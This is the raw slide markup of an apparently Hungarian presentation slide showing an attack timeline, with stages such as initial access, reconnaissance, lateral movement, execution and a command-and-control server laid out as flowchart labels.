            </a:prstGeom>
            <a:effectLst>
              <a:outerShdw blurRad="5080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" name="Kép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1684" y="2663617"/>
            <a:ext cx="4172532" cy="3753374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416990"/>
            <a:ext cx="5793073" cy="3870010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Graphic 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{158B0688-AAEB-1289-1FFC-ADB73E3F46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8563" y="7271995"/>
            <a:ext cx="4103227" cy="720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26410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07534E38-8309-4348-817B-97EF0738D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707" y="1344423"/>
            <a:ext cx="6293493" cy="202760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C034E9F-7801-FA6B-3C5E-E7EED8357F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9513" y="1747096"/>
            <a:ext cx="5601201" cy="98285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551762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7747F-F8A1-8D10-6917-07A028E4A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F5B0F0C-F23A-094D-36AF-BB506DB9239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1093533" y="9417056"/>
            <a:ext cx="16100931" cy="1255885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5072E517-D652-0086-6062-F5B1F95FB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749" y="1751264"/>
            <a:ext cx="2730501" cy="27305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94AB4DC-5B22-383A-3676-B5FDBFA0B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300" y="318451"/>
            <a:ext cx="16535400" cy="1431256"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>A végzet idővonala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6EAFC47-D789-2EB8-E787-10CA6802D430}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1338870" y="6476999"/>
            <a:ext cx="16072830" cy="266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A8FB3816-C665-348C-F7FC-C70541B85960}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17292582" y="6357881"/>
            <a:ext cx="238237" cy="238237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461C24F-7559-9F31-B980-9B4887897CAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="85608" y="5381071"/>
            <a:ext cx="2506523" cy="1215046"/>
            <a:chOff x="85608" y="4047571"/>
            <a:chExt cx="2506523" cy="1215046"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Flowchart: Connector 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1AB8F34-DEF8-D657-7805-E58EBE294C08}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219753" y="5024380"/>
              <a:ext cx="238237" cy="238237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A321DA1-36AE-6B7C-6973-FEBE257BE104}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="9" idx="2"/>
              <a:endCxn id="5" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1338870" y="4524625"/>
              <a:ext cx="2" cy="499755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767FDB-3629-F3F1-8C99-0926184D8344}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="85608" y="4047571"/>
              <a:ext cx="2506523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solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Minden rendben</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="25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5F5210E-6BAB-A8BD-1CD9-29171982A7D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2711248" y="4681823"/>
            <a:ext cx="2506523" cy="1914294"/>
            <a:chOff x="85608" y="3348323"/>
            <a:chExt cx="2506523" cy="1914294"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Flowchart: Connector 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F857AE4-DDAB-021F-E114-EBE15C92F095}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219753" y="5024380"/>
              <a:ext cx="238237" cy="238237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6665C1C-1B26-1990-33AF-8A39C197FB2E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="36" idx="2"/>
              <a:endCxn id="34" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1338870" y="3825377"/>
              <a:ext cx="2" cy="1199003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01583C2-6DED-BC01-FAD2-5F90C77AC412}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="85608" y="3348323"/>
              <a:ext cx="2506523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solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Minden rendben</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="25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7F14AE9-0547-A35C-DAA7-0A37179BB4C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5336888" y="5381071"/>
            <a:ext cx="2506523" cy="1215046"/>
            <a:chOff x="85608" y="4047571"/>
            <a:chExt cx="2506523" cy="1215046"/>
          </a:xfrm>
        </p:grpSpPr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72FE1C56-8499-C4FB-C9D5-613E3EF2ADE2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219753" y="5024380"/>
              <a:ext cx="238237" cy="238237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7C8F1734-4C2C-674E-D8EB-15EB93BE6301}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="40" idx="2"/>
              <a:endCxn id="38" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1338870" y="4524625"/>
              <a:ext cx="2" cy="499755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04A89FF-1506-25C4-B9F3-6039170E7744}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="85608" y="4047571"/>
              <a:ext cx="2506523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solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Minden rendben</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="25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7BBA779-65C9-B3CA-F3BD-FD163477F434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7962529" y="4681823"/>
            <a:ext cx="2506523" cy="1914294"/>
            <a:chOff x="85609" y="3348323"/>
            <a:chExt cx="2506523" cy="1914294"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Flowchart: Connector 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C71150E6-F206-2CDB-29CA-29CB3CBE40EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219753" y="5024380"/>
              <a:ext cx="238237" cy="238237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B14AC8FF-1BBD-39CC-03F0-BD3D39AF7618}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="44" idx="2"/>
              <a:endCxn id="42" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1338871" y="3825377"/>
              <a:ext cx="1" cy="1199003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A6F49B4-EFCB-CB3C-698A-B839260B1A38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="85609" y="3348323"/>
              <a:ext cx="2506523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solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Minden rendben</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="25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D427BE1-95D1-8C3C-8611-10B6FD12FB47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10588169" y="5381071"/>
            <a:ext cx="2506523" cy="1215046"/>
            <a:chOff x="85608" y="4047571"/>
            <a:chExt cx="2506523" cy="1215046"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Flowchart: Connector 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F76FED78-46D4-2FC7-7ABF-C6A3E2BDE1A9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219753" y="5024380"/>
              <a:ext cx="238237" cy="238237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6A8A2BBE-DDAC-B3D2-7ADA-54F2D9A98D5B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="49" idx="2"/>
              <a:endCxn id="47" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1338870" y="4524625"/>
              <a:ext cx="2" cy="499755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E6D0453-73C7-B5BF-6CA2-E93AE1EAB58A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="85608" y="4047571"/>
              <a:ext cx="2506523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solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Minden rendben</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="25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8C8A708-5DEF-704D-54F0-B750364F43C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="85610" y="6596117"/>
            <a:ext cx="2506523" cy="338554"/>
            <a:chOff x="190403" y="4233930"/>
            <a:chExt cx="2506523" cy="338554"/>
          </a:xfrm>
        </p:grpSpPr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38FD9DA1-067C-00CD-D81F-D358561CCBCD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="70" idx="0"/>
              <a:endCxn id="5" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1443665" y="4233930"/>
              <a:ext cx="0" cy="50800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BAA0145-5A48-67B0-7ED2-EFB154A4CB09}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="190403" y="4233930"/>
              <a:ext cx="2506523" cy="3385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1600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Kezdet</a:t>
              </a:r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7D18E120-96D6-AFEA-F8C8-27BDE91E4694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11180607" y="3996076"/>
            <a:ext cx="6572923" cy="2600041"/>
            <a:chOff x="11180607" y="3996076"/>
            <a:chExt cx="6572923" cy="2600041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8BB2912-488F-3731-B8B3-9502746536DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="11180607" y="3996076"/>
              <a:ext cx="6572923" cy="2600041"/>
              <a:chOff x="-1947594" y="2662576"/>
              <a:chExt cx="6572923" cy="2600041"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="Flowchart: Connector 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC6A36F-0A4D-45D0-7810-A9698CD4DDFF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1219753" y="5024380"/>
                <a:ext cx="238237" cy="238237"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartConnector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CFF4F42F-D585-D4B9-5EEE-21B4A2D30281}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="53" idx="2"/>
                <a:endCxn id="51" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1338868" y="4047571"/>
                <a:ext cx="4" cy="976809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B818C0B6-94CE-FCB4-CCDB-53DC8AA73404}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-1947594" y="2662576"/>
                <a:ext cx="6572923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en-US" sz="2800" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-lt"/>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-lt"/>
                  </a:rPr>
                </a:br>
                <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="en-US" sz="28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pic>
          <p:nvPicPr>
            <p:cNvPr id="106" name="Picture 105" descr="A letter f in orange letters&#10;&#10;AI-generated content may be incorrect.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9982096-E2E4-DDCB-8EB7-34408A0F19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64226" y="4114323"/>
              <a:ext cx="6405683" cy="1170694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2438BD7-F0B3-75FE-DE46-3FE15363B47D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1227559" y="6357880"/>
            <a:ext cx="2856071" cy="1107183"/>
            <a:chOff x="-85258" y="4186641"/>
            <a:chExt cx="2856071" cy="1107183"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Flowchart: Connector 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{162E937D-DA69-2069-E84A-2BF50E324A3E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CCEF0399-8FA8-50DA-1BAA-D4900775B386}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="11" idx="0"/>
              <a:endCxn id="8" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1338872" y="4424878"/>
              <a:ext cx="3906" cy="391892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36A43E-0238-7AC9-7DC8-134D54587B10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-85258" y="4816770"/>
              <a:ext cx="2856071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rPr>
                <a:t>Kezdeti hozzáférés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7338F62-B47C-E595-5AE6-AC5014F0655A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2068728" y="6357880"/>
            <a:ext cx="2953547" cy="1748929"/>
            <a:chOff x="-137903" y="4186641"/>
            <a:chExt cx="2953547" cy="1748929"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Flowchart: Connector 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5EB47CD-A5AE-AA9B-680A-B089434A988C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FF2B76F-C012-1C1D-AAA5-2F233C216143}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="15" idx="0"/>
              <a:endCxn id="13" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1338871" y="4424878"/>
              <a:ext cx="1" cy="1033638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4F21B44-D196-540E-764F-582924292102}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-137903" y="5458516"/>
              <a:ext cx="2953547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</a:rPr>
                <a:t>F</a:t>
              </a:r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</a:rPr>
                <a:t>elderítés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0BF7E2C-3A9E-1932-17BE-845D1926AD56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7111347" y="6357880"/>
            <a:ext cx="2856071" cy="985263"/>
            <a:chOff x="-85258" y="4186641"/>
            <a:chExt cx="2856071" cy="985263"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Flowchart: Connector 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FA3C3EB-E1E4-6DEE-8CC7-30A6612A2380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A1B94703-B20E-86FA-759C-4DD402AB2621}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="24" idx="0"/>
              <a:endCxn id="22" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1338872" y="4424878"/>
              <a:ext cx="3906" cy="269972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7A2DAE1-F599-840E-E122-D2F4CE2E03E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-85258" y="4694850"/>
              <a:ext cx="2856071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rPr>
                <a:t>Elterelés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509F94B-5535-6024-A298-60FD89D010DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5704695" y="6357880"/>
            <a:ext cx="2953547" cy="1945383"/>
            <a:chOff x="-137903" y="4186641"/>
            <a:chExt cx="2953547" cy="1945383"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Flowchart: Connector 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{831D0AFE-45C3-4F5E-37F5-CAAA12140F26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EDB90167-9E3E-118F-CD43-555BAD6FE2D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="28" idx="0"/>
              <a:endCxn id="26" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1338871" y="4424878"/>
              <a:ext cx="1" cy="1230092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6D6C3C3-3912-030B-271A-DCDBDBE7DFAE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-137903" y="5654970"/>
              <a:ext cx="2953547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rPr>
                <a:t>Oldalirányú mozgás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E556988-AFF7-419E-3D14-26050D3DEE94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2635242" y="6357880"/>
            <a:ext cx="3506613" cy="2937397"/>
            <a:chOff x="-414436" y="4186641"/>
            <a:chExt cx="3506613" cy="2937397"/>
          </a:xfrm>
        </p:grpSpPr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8D6712FC-CBD6-4B0E-EC96-734554D917C0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8419B94F-0C07-A74D-4CDD-1D8F63B8F87F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="54" idx="0"/>
              <a:endCxn id="32" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1338871" y="4424878"/>
              <a:ext cx="1" cy="1837386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49CEAD-C301-A0E4-3B55-4FCEAAC32E1C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-414436" y="6262264"/>
              <a:ext cx="3506613" cy="86177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</a:rPr>
                <a:t>Használni kívánt eszközök beszerzése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65CC89D-9B2F-0149-52FB-36B7F7A55D44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3764823" y="6357880"/>
            <a:ext cx="2953547" cy="1619389"/>
            <a:chOff x="-137903" y="4186641"/>
            <a:chExt cx="2953547" cy="1619389"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="Flowchart: Connector 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E948993-5A7B-6B05-B83E-0DF65A38560A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4C2D240B-2BB9-0504-27DC-F2297F106D3A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="58" idx="0"/>
              <a:endCxn id="56" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1338871" y="4424878"/>
              <a:ext cx="1" cy="904098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2675F3A-ECF1-FE38-C9C1-74ED56DF91F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-137903" y="5328976"/>
              <a:ext cx="2953547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</a:rPr>
                <a:t>Futtatás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DA5C80E-85B9-9C25-2E8D-F551F4F30B79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4008788" y="6357617"/>
            <a:ext cx="3255326" cy="1107446"/>
            <a:chOff x="-288791" y="4186641"/>
            <a:chExt cx="3255326" cy="1107446"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="Flowchart: Connector 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C24EE495-DB6B-3A3D-0C91-AB2875D7E2A4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28A1971D-CDEA-5CAB-1E29-604CE9647CE8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="62" idx="0"/>
              <a:endCxn id="60" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1338872" y="4424878"/>
              <a:ext cx="0" cy="392155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C31F01B-E4CE-45A8-F64D-4F493930791C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-288791" y="4817033"/>
              <a:ext cx="3255326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rPr>
                <a:t>C&amp;C szerver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850C0D8E-27EE-E835-E4FD-0E62C3E8083B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7746587" y="6364051"/>
            <a:ext cx="2953547" cy="1457703"/>
            <a:chOff x="-137903" y="4186641"/>
            <a:chExt cx="2953547" cy="1457703"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="Flowchart: Connector 72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A17615B-5898-37BB-5035-5CF5EFCCF2BD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DA9313BA-0F1A-98F5-A590-93A10E6E9B36}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="75" idx="0"/>
              <a:endCxn id="73" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1338871" y="4424878"/>
              <a:ext cx="1" cy="742412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C53C13C-8056-B30F-48DE-1BE99BAAE69F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
